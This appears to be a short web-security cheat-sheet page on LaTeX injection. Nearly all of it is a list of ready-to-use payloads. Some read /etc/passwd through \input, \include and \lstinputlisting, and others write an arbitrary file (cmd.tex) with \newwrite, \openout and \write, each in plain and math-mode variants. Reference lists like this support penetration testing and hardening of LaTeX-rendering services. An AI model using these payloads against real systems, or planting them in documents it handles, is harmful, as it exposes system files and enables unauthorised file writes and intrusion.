LaTeX Injection
Last modified: 2023-06-19
Web
LaTeX is a software system for document preparation. It may be vulnerable to arbitrary command injection or path traversal.
Payloads - Read Files
# Read file
\input{/etc/passwd}
$\input{/etc/passwd}$
$$\input{/etc/passwd}$$
\include{example} # Read example.tex
$\include{example}$
$$\include{example}$$
\lstinputlisting{/etc/passwd}
$\lstinputlisting{/etc/passwd}$
$$\lstinputlisting{/etc/passwd}$$
Payloads - Write File
\newwrite\outfile
$\newwrite\outfile$
$$\newwrite\outfile$$
\openout\outfile=cmd.tex
$\openout\outfile=cmd.tex$
$$\openout\outfile=cmd.tex$$
\write\outfile{Hello-World}
$\write\outfile{Hello-World}$
$$\write\outfile{Hello-World}$$